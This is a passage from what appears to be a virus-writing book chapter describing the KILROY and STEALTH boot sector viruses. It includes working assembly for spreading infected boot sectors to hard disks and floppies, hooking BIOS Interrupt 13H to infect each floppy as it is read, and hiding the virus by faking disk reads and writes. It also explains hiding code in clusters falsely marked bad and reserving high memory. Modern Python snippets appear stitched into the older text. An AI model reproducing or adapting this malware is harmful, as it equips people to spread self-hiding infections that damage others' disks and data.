listing for this basic (non-viral) boot sector, BOOT.ASM, is presented

in Appendix C.

The Search and Copy Mechanism

Ok, let's breathe some life into this boot sector. Doing that

is easy because the boot sector is such a simple animal. Since code

size is a primary concern, the search and copy routines are combined

in KILROY to save space.

First, the copy mechanism must determine where it came

from. The third to the last byte in the boot sector will be set up by

the virus with that information. If the boot sector came from drive

A, that byte will be zero; if it came from drive C, that byte will be

80H. It cannot come from any other drive since a PC boots only

from drive A or C.

Once KILROY knows where it is located, it can decide

where to look for other boot sectors to infect. Namely, if it is from

drive A, it can look for drive C (the hard disk) and infect it. If there

is no drive C, it can look for a second floppy drive, B:, to infect.

(There is never any point in trying to infect A. If the drive door on

A: were closed, so it could be infected, then the BIOS would have

loaded the boot sector from there instead of C:, so drive A would

already be infected.)

One complication in infecting a hard drive is that the virus

cannot tell where the DOS boot sector is located without loading

the partition boot sector (at Track 0, Head 0, Sector 1) and reading

the information in it. There is not room to do that in such a simple


virus, so we just guess instead. We guess that the DOS boot sector

is located at Track 0, Head 1, Sector 1, which will normally be the

first sector in the first partition. We can check the last two bytes in

that sector to make sure they are 55H AAH. If they are, chances are

good that we have found the DOS boot sector. In the relatively rare

cases when those bytes belong to some other boot sector, for a

different operating system, tough luck. The virus will crash the disk.

If the ID bytes 55H AAH are not found in an infection attempt, the

virus will be polite and forget about trying to infect the hard drive.

It will go for the second floppy instead.

Once a disk has been found to infect, the copy mechanism

is trivial. All one need do is:

1) Read the boot sector from the disk to infect into a data

area.

2) Copy the viral boot sector into this data area, except

the disk data at the start of the sector, which is dependent

on the drive.

3) Write the infected sector back out to the disk which is

being infected.

That's it. The code for the search/copy mechanism looks like this:

SPREAD:

MOV BX,OFFSET DISK_BUF ;read other boot sectors to here

CMP BYTE PTR [DRIVE],80H

JZ SPREAD2 ;if it's C, go try to spread to B

MOV DX,180H ;if it's A, try to spread to C

CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive

JZ SPREAD2 ;none try floppy B

MOV CX,1 ;read Track 0, Sector 1

MOV AX,201H

INT 13H

JC SPREAD2 ;on error, go try drive B

CMP WORD PTR [NEW_ID],0AA55H ;make sure it's really a boot sec

JNZ SPREAD2

CALL MOVE_DATA

MOV DX,180H ;and go write the new sector

MOV CX,1

MOV AX,301H

INT 13H

JC SPREAD2 ;error writing to C:, try B:

JMP SHORT LOOK_SYS ;no error, look for system files

SPREAD2:

MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B drive

AND AL,0C0H

ROL AL,1 ;put bits 6 & 7 into bits 0 & 1

ROL AL,1

INC AL ;add one, so now AL=# of drives

CMP AL,2

JC LOOK_SYS ;no B drive, just quit


MOV DX,1 ;read drive B

MOV AX,201H ;read one sector

MOV CX,1 ;read Track 0, Sector 1

INT 13H

JC LOOK_SYS ;if an error here, just exit

CMP WORD PTR [NEW_ID],0AA55H ;make sure it's really a boot sec

JNZ LOOK_SYS ;no, don't attempt reproduction

CALL MOVE_DATA ;yes, move this boot sec in place

MOV DX,1

MOV AX,301H ;and write this boot sector to B:

MOV CX,1

INT 13H

MOVE_DATA:

MOV SI,OFFSET DSKBASETBL ;move all of the boot sector code

MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL OFFSET BOOTSEC)

MOV CX,OFFSET DRIVE OFFSET DSKBASETBL

REP MOVSB

MOV SI,OFFSET BOOTSEC ;move initial jmp and the sec ID

MOV DI,OFFSET DISK_BUF

MOV CX,11

REP MOVSB

RET

We place this code in the boot sector after the Disk Parameter Table

has been set up, and before the system files are located and loaded.

Taming the Virus

The KILROY virus is very subtle. The average user may

never see a clue that it is there. Since there is enough room left, let

us be kind, and put in some code to display the message "Kilroy

was here!" at boot time. Since DOS hasn't been loaded yet, we can't

use DOS to display that message. Instead we use BIOS Interrupt

10H, Function 0EH, and apply it repeatedly, as follows:

DISP_MSG:
        MOV     SI,OFFSET MESSAGE               ;set offset of message up
DM1:
        MOV     AH,0EH                          ;Execute BIOS INT 10H, Fctn 0EH
        LODSB                                   ;get character to display
        OR      AL,AL
        JZ      DM2                             ;repeat until 0
        INT     10H                             ;display it
        JMP     SHORT DM1                       ;and get another
DM2:    RET

MESSAGE:        DB      'Kilroy was here!',0DH,0AH,0AH,0

There. That will tame the virus a bit. Besides displaying a

message, the virus can be noticed as it searches for drives to infect,

especially if you have a second floppy. If your hard disk is infected,

or if you have no hard disk, you will notice that the second floppy

lights up for a second or two before your machine boots up. It didn't

use to do that. This is the virus going out to look for a disk in that

drive to infect. If there is no disk in the drive, the Interrupt 13H call

will return an error and the boot sector will load the operating

system and function normally.

This is a pretty rudimentary virus. It can make mistakes

when infecting the hard drive and miss the boot sector. It can only

replicate when the machine boots up. And it can get stuck in places

where it cannot replicate any further (for example, on a system with

only one floppy disk and a hard disk). Still, it will do its job, and

travel all around the world if you're not careful with it.


Case Number Four:

A Sophisticated Boot Sector Virus

With the basics of boot sectors behind us, let's explore a

sophisticated boot sector virus that will overcome the rather glaring

limitations of the KILROY virus. Specifically, let's look at a virus

which will carefully hide itself on both floppy disks and hard disks,

and will infect new disks very efficiently, rather than just at boot

time.

Such a virus will require more than one sector of code, so

we will be faced with hiding multiple sectors on disk and loading

them at boot time. To do this in such a way that no other data on a

disk is destroyed, while keeping those sectors of virus code well

hidden, will require some little known tricks. Additionally, if the

virus is to infect other disks after bootup, it must leave at least a

portion of itself memory-resident. The mechanism for making the

virus memory resident cannot take advantage of the DOS Keep

function (Function 31H) like typical TSR programs. The virus must

go resident before DOS is even loaded, and it must fool DOS so

DOS doesn't just write over the virus code when it does get loaded.

This requires some more tricks, the exploration of which will be

the subject of this chapter.

Basic Structure of the Virus

Our new boot sector virus, named STEALTH, will have

three parts. First, there is a new boot sector, called the viral boot

sector. This is the sector of code that will replace the original boot

sector at Track 0, Head 0, Sector 1. Secondly, there is the main body

of the virus, which consists of several sectors of code that will be

hidden on the disk. Thirdly, there is the old boot sector, which will

be incorporated into the virus.

When the viral boot sector is loaded and executed at

startup, it will go out to disk and load the main body of the virus

and the old boot sector. The main body of the virus will execute,

possibly infecting the hard disk, and installing itself in memory (as

we will discuss in a moment) so it can infect other disks later. Then

it will copy the original boot sector over the viral boot sector at

0000:7C00H, and execute it. The last step allows the disk to boot

up in a normal fashion without having to bother writing code for

startup. That's important, because STEALTH will infect the partition

boot sector on hard drives. The code in that sector is completely

different from DOS's boot sector. Since STEALTH saves the

original boot sector, it will not have to go around carrying two boot

sectors with it, one for floppies and one for hard disks. Instead, it

simply gobbles up the code that's already there and turns it to its

own purposes. This strategy provides the added benefit that the

STEALTH virus will be completely operating system independent.

The Copy Mechanism

The biggest part of designing the copy mechanism is

deciding how to hide the virus on disk, so it does not interfere with

the normal operation of the computer (unless it wants to).

Before you hide anything, you'd better know how big it is.

It's one matter to hide a key to the house, and quite another to hide

the house itself. So before we start deciding how to hide STEALTH,

it is important to know about how big it will be. Based on the size


of the INTRUDER virus in Chapter 4, we might imagine

STEALTH will require five or ten sectors. With a little hindsight,

it turns out that six will be sufficient. So we need a method of

quickly and effectively hiding 6 sectors on each of the various types

of floppy disks, and on hard disks of all possible types.

It would be wonderful if we could make the virus code

totally invisible to every user. Of course, that isn't possible, although

we can come very close. One tricky way of doing it is to

store the data on disk in an area that is completely outside of

anything that DOS (or other operating systems) can understand. For

floppy disks, this would mean inventing a nonstandard disk format

that could contain the DOS format, and also provide some extra

room to hide the virus code in. DOS could use the standard parts

of the disk the way it always does, and the nonstandard parts will

be invisible to it. Unless someone writes a special program that a)

performs direct calls to the BIOS disk functions and b) knows

exactly where to look, the virus code will be hidden on the disk.

This approach, although problematic for floppies, will prove useful

for hiding the virus on the hard disk.

In the case of floppies, an alternative is to tell DOS to

reserve a certain area of the disk and stay away from it. Then the

virus can put itself in that area and be sure that DOS will not see it

or overwrite it. This can be accomplished by manipulating the File

Allocation Table (FAT). This method was originally employed by the

Pakistani Brain virus, which was written circa 1986. Our

STEALTH virus will use a variant of this method here to handle

360 kilobyte and 1.2 megabyte disk formats for 5 1/4" diskettes,

and 720 kilobyte and 1.44 megabyte 3 1/2" diskette formats.

Let's examine the 3 1/2" 720 kilobyte diskette format in

detail to see how STEALTH approaches hiding itself. This kind of

diskette has 80 tracks, two sides, and nine sectors per track. The

virus will hide the body of its code in Track 79, Side 1, Sectors 4

through 9. Those are the last six sectors on the disk, and

consequently, the sectors least likely to contain data. STEALTH puts the

main body of its code in sectors 4 through 8, and hides the original

boot sector in sector 9. However, since DOS normally uses those

sectors, the virus will be overwritten unless it has a way of telling

DOS to stay out. Fortunately, that can be done by modifying the

FAT table to tell DOS that those sectors on the disk are bad.

DOS organizes a diskette into clusters, which consist of

one or more contiguous sectors. Each cluster will have an entry

corresponding to it in the FAT table, which tells DOS how that

cluster is being used. The FAT table consists of an array of 12 bit

entries, with as many entries as there are clusters on the diskette. If

a cluster is empty, the corresponding FAT entry is 0. If it is in the

middle of a file, the FAT entry is a pointer to the next cluster in the

file; if it is at the end of a file, the FAT entry is FF8 through FFF. A

cluster may be marked as bad (to signal DOS that it could not be

formatted properly) by placing an FF7 Hex in its FAT entry.
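
Because two 12 bit entries are packed into three bytes, reading one entry takes a little bit manipulation. The Python sketch below illustrates that unpacking for a FAT copy that has already been read into memory, for example from a disk image. It is not part of the STEALTH listing. The names fat12_entry, describe and SAMPLE_FAT are invented here, and the reserved values (001 and FF0 through FF6) follow the usual FAT12 convention rather than anything stated above.

```python
def fat12_entry(fat: bytes, cluster: int) -> int:
    """Return the 12-bit FAT entry for the given cluster number."""
    offset = cluster + cluster // 2            # 1.5 bytes per entry
    pair = fat[offset] | (fat[offset + 1] << 8)
    # Even-numbered entries sit in the low 12 bits of the byte pair,
    # odd-numbered entries in the high 12 bits.
    return pair >> 4 if cluster & 1 else pair & 0xFFF


def describe(entry: int) -> str:
    """Translate a FAT12 entry into the meaning DOS gives it."""
    if entry == 0x000:
        return "free"
    if entry == 0xFF7:
        return "bad"
    if entry >= 0xFF8:
        return "end of file"
    if entry == 0x001 or entry >= 0xFF0:
        return "reserved"
    return f"next cluster {entry:03X}h"


# Hand-built sample: entries 0 and 1 are the usual header entries,
# cluster 2 points to cluster 3, cluster 3 ends a file,
# cluster 4 is marked bad and cluster 5 is free.
SAMPLE_FAT = bytes([0xF9, 0xFF, 0xFF, 0x03, 0xF0, 0xFF, 0xF7, 0x0F, 0x00])

if __name__ == "__main__":
    for cluster in range(2, 6):
        print(cluster, describe(fat12_entry(SAMPLE_FAT, cluster)))
```

The same routine works on either of the two FAT copies on a diskette, since they are kept identical.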

When DOS sees an FF7 in a FAT entry, it does not use the

sectors in that cluster for data storage. DOS itself never checks

those clusters to see if they are bad, once they are marked bad. Only

the FORMAT program marks clusters bad when it is in the process

of formatting a disk. From there on out, they are never touched by

DOS. Thus a virus can mark some clusters bad, even though they're

really perfectly fine, and then go hide there, assured that DOS will

leave it alone. On a 720 kilobyte diskette, there are two sectors in

each cluster. Thus, by marking the last three clusters on the disk as

bad in the two FAT tables, the virus can preserve six sectors at the

end of the diskette.
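
The arithmetic behind "the last three clusters" can be checked with a short calculation. The Python sketch below assumes the standard 720 kilobyte layout (one boot sector, two FAT copies of three sectors each, and a 112 entry root directory). Those layout values are not given in the text and are stated here as assumptions, and the class and method names are invented for the illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class FloppyFormat:
    tracks: int
    heads: int
    sectors_per_track: int
    sectors_per_cluster: int
    reserved_sectors: int      # boot sector(s) ahead of the first FAT
    fat_copies: int
    sectors_per_fat: int
    root_entries: int          # directory entries, 32 bytes each

    @property
    def total_sectors(self) -> int:
        return self.tracks * self.heads * self.sectors_per_track

    @property
    def first_data_sector(self) -> int:
        root_sectors = (self.root_entries * 32 + 511) // 512
        return (self.reserved_sectors
                + self.fat_copies * self.sectors_per_fat
                + root_sectors)

    @property
    def last_cluster(self) -> int:
        data_sectors = self.total_sectors - self.first_data_sector
        # Cluster numbering starts at 2, so the last number is count + 1.
        return data_sectors // self.sectors_per_cluster + 1

    def cluster_to_lba(self, cluster: int) -> int:
        """Logical (zero-based) sector number where a cluster starts."""
        return self.first_data_sector + (cluster - 2) * self.sectors_per_cluster

    def lba_to_chs(self, lba: int) -> tuple:
        """Convert a logical sector number to (track, head, sector)."""
        track, rest = divmod(lba, self.heads * self.sectors_per_track)
        head, sector = divmod(rest, self.sectors_per_track)
        return track, head, sector + 1          # sectors count from 1


# Assumed standard values for a 3 1/2" 720 kilobyte diskette.
DISK_720K = FloppyFormat(80, 2, 9, 2, 1, 2, 3, 112)

if __name__ == "__main__":
    last = DISK_720K.last_cluster
    for cluster in range(last - 2, last + 1):
        lba = DISK_720K.cluster_to_lba(cluster)
        print(cluster, DISK_720K.lba_to_chs(lba))
```

Under these assumptions the last three clusters are 712 through 714, and the first of them starts at Track 79, Head 1, Sector 4, which agrees with the location given in the text.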

In the event that the diskette is full of data, the virus should

ideally be polite, and avoid overwriting anything stored in the last

clusters. This is easily accomplished by checking the FAT first, to

see if anything is there before infecting the disk. Likewise, if for

some reason one of those sectors is really bad, the virus should stop

its attempt to copy itself to the diskette gracefully. If it does not, the

diskette could end up being a useless mess (especially if it is a boot

disk) and it wouldn't even contain a working copy of the virus. If

there is a problem at any stage of the infection process, the virus

will simply abort, and no permanent damage will be done to the

disk.

On the other hand, we could design the virus to be more

aggressive. It might be somewhat more successful (from a neo-Darwinian

point of view) if it infected the diskette even when the disk

is full, overwriting a file if necessary to infect the disk

successfully. While we do not implement such an approach here, it

would actually be easier than being polite.

Similar strategies are employed to infect 360 kilobyte and

1.2 megabyte 5 1/4" diskettes, and 1.44 megabyte 3 1/2" diskettes,

as explained in detail in the code in Appendix E. There do exist

other diskette formats, such as 320 kilobyte 5 1/4", which the virus

will simply stay away from. If STEALTH encounters anything

nonstandard, it just won't infect the diskette. It will have plenty of

formats that it can infect, and obsolete or nonstandard formats are

relatively rare. Failing to infect the one-in-a-thousand oddball is

no great loss, and it saves a lot of code. As an exercise, you may

want to modify the virus so it can infect some different formats.

Hiding data on a hard drive is a different matter. There are

so many different drives on the market that it would be a major

effort for STEALTH to adapt to each disk drive separately. Fortunately,

hard drives are not set up to be 100% occupied by DOS.

There are non-DOS areas on every disk. In particular, the first boot

sector, which contains the partition table, is not a part of DOS.

Instead, DOS has a partition assigned to it, for its own use. Any

other area on disk does not belong to DOS.

As it turns out, finding a single area on any hard disk that

does not belong to DOS is not too difficult. If you take the DOS

program FDISK and play with it a little, creating partitions on a

hard drive, you'll soon discover something very interesting:

although the first boot sector is located at Track 0, Head 0, Sector 1,

FDISK (for all the versions I've tested) does not place the start of

the first partition at Track 0, Head 0, Sector 2. Instead, it always

starts at Track 0, Head 1, Sector 1. That means that all of Track 0,

Head 0 (except the first sector) is free space. Even the smallest ten

megabyte disk has 17 sectors per track for each head. That is plenty

of room to hide the virus in. So in one fell swoop, we have a strategy

to place the virus on any hard disk. (By the way, it's only fair to

mention that some low level hard disk formatting programs do use

those sectors to store information in. However, letting the virus

overwrite them does not hurt anything at all.)

Once a strategy for hiding the virus has been developed,

the copy mechanism follows quite naturally. To infect a disk, the

virus must:

1) Determine which type of disk it is going to infect, a

hard disk or one of the four floppy disk types.

2) Determine whether that disk is already infected, or if

there is no room for the virus. If so, the copy mechanism

should not attempt to infect the disk.

3) Update the FAT tables (for floppies) to indicate that

the sectors where the virus is hidden are bad sectors.

4) Move all the virus code to the hidden area on disk.

5) Read the original boot sector from the disk and write

it back out to the hidden area in the sector just after

the virus code.

6) Take the disk parameter data from the original boot

sector (and the partition information for hard disks)

and copy it into the viral boot sector. Write this new

boot sector to disk as the boot sector at Track 0, Head

0, Sector 1.

In the code for STEALTH, the copy mechanism is broken

up into several parts. The two main parts are routines named

INFECT_HARD, which infects the hard disk, and

INFECT_FLOPPY, which infects all types of floppy drives. The

INFECT_FLOPPY routine first determines which type of floppy

drive it is dealing with by reading the boot sector and looking at the

number of sectors on the drive (the variable SEC_COUNT in Table

2). If it finds a match, it calls one of the routines INFECT_360,

INFECT_720, INFECT_12M or INFECT_144M, which goes

through the details of infecting one of the particular diskette types.

All of these routines are listed in Appendix E.
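
Telling the diskette formats apart by sector count is also useful when simply examining a disk image. The Python sketch below reads the total sector count from a boot sector and maps it to one of the four formats named above. It assumes the count is stored as a 16-bit little-endian word at offset 13H of the boot sector, the usual position in the DOS disk parameter data, which may or may not match the layout of Table 2. The function and table names are invented for the illustration.

```python
import struct

# Total sectors = tracks x heads x sectors per track for each format.
FORMATS_BY_SECTOR_COUNT = {
    720: "360K 5 1/4 inch",    # 40 x 2 x 9
    1440: "720K 3 1/2 inch",   # 80 x 2 x 9
    2400: "1.2M 5 1/4 inch",   # 80 x 2 x 15
    2880: "1.44M 3 1/2 inch",  # 80 x 2 x 18
}

SEC_COUNT_OFFSET = 0x13  # assumed position of the total sector count


def total_sectors(boot_sector: bytes) -> int:
    """Read the 16-bit total sector count from a boot sector."""
    if len(boot_sector) < SEC_COUNT_OFFSET + 2:
        raise ValueError("boot sector is too short")
    (count,) = struct.unpack_from("<H", boot_sector, SEC_COUNT_OFFSET)
    return count


def classify_floppy(boot_sector: bytes):
    """Return the format name, or None for anything nonstandard."""
    return FORMATS_BY_SECTOR_COUNT.get(total_sectors(boot_sector))
```

A 320 kilobyte diskette reports 640 sectors, so classify_floppy returns None for it, mirroring the "stay away from anything nonstandard" rule described above.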

The Search Mechanism

Searching for uninfected disks is not very difficult. We

could put an ID byte in the viral boot sector so when the virus reads

the boot sector on a disk and finds the ID, it knows the disk is

infected. Otherwise it can infect the disk. The STEALTH virus uses

its own code as an ID. It reads the boot sector and compares the

first 30 bytes of code (starting after the boot sector data area) with

the viral boot sector. If they don't match, the disk is ripe for

infection.

The code for a compare like this is incorporated into the

routine IS_VBS:

IS_VBS:

push si ;save these

push di

cld

mov di,OFFSET BOOT ;set up for a compare

mov si,OFFSET SCRATCHBUF+(OFFSET BOOT - OFFSET BOOT_START)

mov cx,15

repz cmpsw ;compare 30 bytes

pop di ;restore these

pop si

ret ;return with z properly set

which returns a z flag if the disk is infected, and nz if it is not. BOOT

is the label for the start of the code in the boot sector.

BOOT_START is the beginning of the boot sector at 7C00H.

IS_VBS is called only after a boot sector is read from the disk by

the GET_BOOT_SEC routine into the scratch data area

SCRATCHBUF. The code to read the boot sector is:

GET_BOOT_SEC:

push ax

mov bx,OFFSET SCRATCHBUF ;buffer for boot sec

mov dl,al ;drive to read from

mov dh,0 ;head 0

mov ch,0 ;track 0

mov cl,1 ;sector 1

mov al,1 ;read 1 sector

mov ah,2 ;BIOS read function

int 13H ;go do it

pop ax

ret

which reads the boot sector from the drive specified in al.
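
The same 30 byte comparison is what a simple scanner would perform on a boot sector pulled from a disk image. The Python sketch below models it. It is an illustration only: the function name is invented, and code_offset stands for the distance OFFSET BOOT - OFFSET BOOT_START, whose actual value is not given in this chapter and must be supplied by the caller.

```python
SIGNATURE_LENGTH = 30  # IS_VBS compares 15 words, that is 30 bytes


def same_boot_code(sector: bytes, reference: bytes, code_offset: int) -> bool:
    """Return True if both sectors hold the same 30 bytes at code_offset.

    sector      -- boot sector read from the disk being examined
    reference   -- known boot sector to compare against
    code_offset -- where the code starts, after the boot sector data area
                   (a caller-supplied assumption, see the note above)
    """
    end = code_offset + SIGNATURE_LENGTH
    if len(sector) < end or len(reference) < end:
        raise ValueError("sector too short for the comparison")
    return sector[code_offset:end] == reference[code_offset:end]
```

Only the code bytes are compared, so differences in the disk parameter data ahead of code_offset do not affect the result.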

So far, fairly easy. However, the more serious question in

designing a search mechanism is when to search for a disk to infect.

Infecting floppy disks and hard disks are entirely different matters.

A user with a hard disk on his machine will rarely, if ever, boot from

a floppy. Often, booting from a floppy will be an accident. For

example, a user might leave a diskette in drive A when he goes home

from work, and then come in the next morning and turn his

machine on. Normally such a disk will not be a boot disk with DOS

on it, and it will cause an error. The user will see the error and take

it out to boot from the hard drive as usual. However, the boot sector

on the floppy disk was loaded and executed. The infection mechanism

for moving from a floppy disk to a hard disk must take

advantage of this little mistake on the user's part to be truly

effective. That means hard drives should be infected at boot time.

Then if a user leaves an infected diskette in drive A and turns on

his machine, his hard drive is infected immediately. No other

operation is necessary.

On the other hand, once a hard disk has the virus on it, it

may come into contact with dozens or even hundreds of floppy

diskettes during one day. In order to infect them, the virus must be

present in memory when the diskettes are in the floppy drive. That

means when the virus is loaded from a hard drive, it must become

memory-resident and stay there. Then, it must activate whenever

some appropriate action is performed on the floppy diskette by

other programs. In this way, the computer becomes an engine for

producing infected floppy disks.

So what action on the floppy drive should trigger the

infection sequence? It should certainly be something that happens

frequently, yet at the same time it should require a bare minimum

of extra disk activity. Both search and infection should happen

simultaneously, since floppy disks can easily be removed and

inserted. If they were not simultaneous, the search could indicate

an uninfected diskette on drive A. Then the infection routine could

attempt to infect an already infected disk if the user were given time

to change disks before the infection routine got around to doing its

job.

An ideal time to check the floppy disk for the virus is when

a particular sector is read from the disk. That can be a frequent or

rare occurrence, depending on which sector we choose as a trigger.

A sector near the end of the disk might be read only rarely, since

the disk will rarely be full. At the other extreme, if it were to trigger

when the boot sector itself is read, the disk would be infected

immediately, since the boot sector on a newly inserted floppy disk

is read before anything else is done. The STEALTH virus takes the

most aggressive approach possible. It will go into the infection

sequence any time that the boot sector is read. That means that when

the virus is active, any time you so much as insert a floppy disk into

the drive, and do a directory listing (or any other operation that reads

the disk), it will immediately become infected. The virus must

churn out a lot of floppies in order for a few to get booted from.

To implement this search mechanism, the STEALTH virus

must intercept Interrupt 13H, the BIOS disk service, at boot time,

and then monitor it for attempts to access the boot sector. When

such an attempt is made, the virus will carefully lay it aside for a

bit while it loads the boot sector from that diskette for its own use,

checks it with IS_VBS, and possibly infects the diskette. After the

virus is finished with its business, it will resume the attempt to read

the disk and allow the program that wanted to access the boot sector

to continue its operation unhindered.

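Figure 15: Infect Logic. (Flowchart: an intercepted BIOS read sector

request is tested for Head 0, Track 0, a floppy rather than a hard

disk, and Sector 1. If any test fails, control passes to the ROM

BIOS. Otherwise the boot sector is read; if the disk is not already

infected, it is infected, and control then passes to the ROM BIOS.)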

Code for this type of an interrupt trap looks like this:

INT_13H:

sti ;interrupts on

cmp ah,2 ;we want to intercept reads

jnz I13R ;pass anything else to BIOS

cmp dh,0 ;is it head 0?

jnz I13R ;nope, let BIOS handle it

cmp ch,0 ;is it track 0?

jnz I13R ;nope, let BIOS handle it

RF0: cmp dl,80H ;is it the hard disk?

jnc I13R ;yes, let BIOS handle read

cmp cl,1 ;no, floppy, is it sector 1?

jnz I13R ;no, let BIOS handle it

call CHECK_DISK ;is floppy already infected?

jz I13R ;yes so let BIOS handle it

call INFECT_FLOPPY ;else go infect the diskette

;and then let BIOS go

;do the original read

I13R: jmp DWORD PTR cs:[OLD_13H] ;BIOS Int handler

where OLD_13H is the data location where the original Interrupt

13H vector is stored before it is replaced with a vector to INT_13H.

CHECK_DISK simply calls GET_BOOT_SEC and IS_VBS after

saving all the registers (to pass them to the BIOS later to do the

originally requested read).

The Anti-Detection Mechanism

The STEALTH virus uses more advanced anti-detection

logic than the previous viruses we've studied. It is aimed not

only at avoiding detection by the average user, who doesn't know

computers that well, but also at avoiding detection by a user armed

with sophisticated software tools, including programs designed

specifically to look for viruses.

The main part of the STEALTH virus is already hidden on

disk in areas which the operating system thinks are unusable. On

floppy disks, only the viral boot sector is not hidden. On hard drives,

the whole virus is exposed in a way, since it is sitting on Track 0,

Head 0. However, none of those sectors are accessed by programs

or the operating system, although the FDISK program rewrites the

partition boot sector.

Since the virus is already intercepting Interrupt 13H to

infect disks, it is not too difficult to add a little functionality to the

viral interrupt handler to hide certain sectors from prying eyes. For

example, consider an attempt to read the boot sector on a 1.2

megabyte diskette: STEALTH traps the request to read. Instead of

just blindly servicing it, the virus first reads the boot sector into its

own buffer. There, it checks to see if this sector is the viral boot

sector. If not, it allows the caller to read the real boot sector. On the

other hand, if the real boot sector belongs to STEALTH, it will read

the old boot sector from Track 79, Head 1, Sector 15, and pass that

to the caller instead of the viral boot sector. In this way, the viral

boot sector will be invisible to any program that uses either DOS

or BIOS to read the disk (and the exceptions to that are pretty rare),

provided the virus is in memory. In the same way, the BIOS write

function can be redirected to keep away from the viral boot sector,

redirecting any attempts to write there to the old sector.

Figure 16: Viral Read Logic. (Flowchart: an intercepted BIOS read

sector request for Head 0, Track 0 is sorted by drive type and sector

number. A read of the boot sector on an infected disk is answered

with the old boot sector from the hidden area on disk, moved to the

es:bx specified by the caller. A read of the hidden sectors on the

hard disk is answered with dummy data moved to es:bx. An uninfected

floppy is infected. Everything else passes to the ROM BIOS.)

In addition to hiding the boot sector, one can hide the rest

of the virus from any attempts to access it through Interrupt 13H.

On hard drives, STEALTH does not allow one to read or write to

sectors 2 through 7 on Track 0, Head 0, because the virus code is

stored there. It fools the program making a read attempt by returning

a data block of zeros. It fools the program trying to write those

sectors by returning as if it had written them, when in fact the

writing was bypassed.

Additionally, any attempt to read or write to the hidden sectors on the

floppy drive could be trapped and returned with an error (carry flag

c set). That is what one would expect, if the clusters marked as bad

in the FAT really were bad. STEALTH does not go that far though,

since DOS protects those sectors pretty well already. You may want

to try to incorporate that extension as an exercise, though.

With these anti-detection procedures in place, the main

body of the virus is well hidden, and when any program looks at

the boot sector, it sees the old boot sector. The only ways to detect

the virus on a disk are (a) to write a program to access the disk with

the hardware directly, or (b) to boot from an uninfected disk and

examine the boot sector of the potentially infected disk. Of course,

the virus is not very well hidden in memory.
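
When a diskette is examined from a clean boot, as in (b), one visible symptom of the hiding scheme described earlier is a run of clusters marked bad at the very end of the FAT. The Python sketch below counts such a run in a FAT copy read from a disk image. It is a rough heuristic, not a reliable detector, since genuinely bad clusters can also occur at the end of a disk. The function names are invented here, and the last cluster number used in the demonstration (714 for a 720 kilobyte diskette) assumes the standard layout for that format.

```python
BAD_CLUSTER = 0xFF7


def fat12_get(fat, cluster: int) -> int:
    """Read one 12-bit entry from a FAT12 table."""
    offset = cluster + cluster // 2
    pair = fat[offset] | (fat[offset + 1] << 8)
    return pair >> 4 if cluster & 1 else pair & 0xFFF


def fat12_set(fat: bytearray, cluster: int, value: int) -> None:
    """Write one 12-bit entry (used here only to build test data)."""
    offset = cluster + cluster // 2
    if cluster & 1:
        # Odd entry: high nibble of the first byte, all of the second.
        fat[offset] = (fat[offset] & 0x0F) | ((value & 0x00F) << 4)
        fat[offset + 1] = value >> 4
    else:
        # Even entry: all of the first byte, low nibble of the second.
        fat[offset] = value & 0xFF
        fat[offset + 1] = (fat[offset + 1] & 0xF0) | (value >> 8)


def trailing_bad_clusters(fat, last_cluster: int) -> int:
    """Count consecutive clusters marked bad, working back from the end."""
    count = 0
    cluster = last_cluster
    while cluster >= 2 and fat12_get(fat, cluster) == BAD_CLUSTER:
        count += 1
        cluster -= 1
    return count


if __name__ == "__main__":
    fat = bytearray(3 * 512)              # three-sector FAT, all free
    for cluster in (712, 713, 714):
        fat12_set(fat, cluster, BAD_CLUSTER)
    print(trailing_bad_clusters(fat, 714))
```

A result of exactly three on a 720 kilobyte diskette is worth a closer look at the boot sector, but it proves nothing by itself.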

Installing the Virus in Memory

Before the virus passes control to the original boot sector,

which will load DOS, it must set itself up in memory somewhere

where it won't get touched. To do this outside of the control of DOS

is a bit tricky. The basic idea involved here is that DOS uses a

number stored at 0040:0013 Hex, which contains the size of available

memory in kilobytes. This number is set up by the BIOS before

it reads the boot sector. It may have a value ranging up to 640 =

280H. When the BIOS sets this parameter up, it looks to see how

much memory is actually installed in the computer, and reports it

here. However, something could come along before DOS loads and

change this number to a smaller value. In such a situation, DOS

will not use all the memory that is available in the system, but only

what it's told to use by this memory size variable. Memory above

that point will be reserved, and DOS won't touch it.
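
The effect of a smaller memory size value is easy to work out by hand. The Python sketch below converts a size in kilobytes to the segment address where memory is taken to end, using a 4 kilobyte reduction purely as an example. The function names are invented for the illustration, and nothing here touches real memory.

```python
PARAGRAPH = 16  # bytes per segment unit in real mode


def top_of_memory_segment(size_kb: int) -> int:
    """Segment address just past the memory reported as available."""
    return size_kb * 1024 // PARAGRAPH


def reduced_size(size_kb: int, reserve_kb: int) -> int:
    """Memory size value after reserve_kb is held back at the top."""
    if not 0 <= reserve_kb <= size_kb:
        raise ValueError("cannot reserve more memory than is installed")
    return size_kb - reserve_kb


if __name__ == "__main__":
    full = 640                            # 280H, the maximum value
    smaller = reduced_size(full, 4)       # example reduction of 4K
    print(f"{full}K ends at segment {top_of_memory_segment(full):04X}")
    print(f"{smaller}K ends at segment {top_of_memory_segment(smaller):04X}")
```

With 640K reported, memory ends at segment A000; with 636K reported, it ends at segment 9F00, and everything from 9F00:0000 up to A000:0000 is left alone by DOS.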

The strategy for loading STEALTH into memory is to put

it in the highest physical memory available, determined by the

memory size, as the BIOS has set it. Then STEALTH subtracts a

sufficient number of kilobytes from the memory size variable to

protect itself. In this way, that memory will be kept away from DOS,

and used by STEALTH when Interrupt 13H is called.

The two responsibilities of the viral boot sector are to load

the main body of the virus into memory, and then to load and

execute the original boot sector. When the BIOS loads the viral boot

sector (and it loads whatever is placed at Track 0, Head 0, Sector

1), that sector first moves itself into the highest 512 bytes of

memory (within the 640 kilobyte limit). In a machine with 640K

of memory, the first unoccupied byte of memory is at A000:0000.

Figure 17: The Virus in RAM. (Three memory maps: (A) the viral boot

sector moves itself from 0000:7C00 to high memory just below

A000:0000; (B) the viral boot sector loads the rest of the virus and

the old boot sector starting at 9820:7000; (C) the viral boot sector

installs Int 13H, changing the vector at 0000:004C from F000:2769 to

9820:0054, and moves the old boot sector to 0000:7C00 to execute.)

The boot sector will move itself to the first 512 bytes just below

this. Since that sector was compiled with an offset of 7C00 Hex, it

must relocate to 9820:7C00 Hex (which is right below A000:0000),

as desired. Next, the viral boot sector will read the 6 sector long

main body of the virus into memory just below this, from
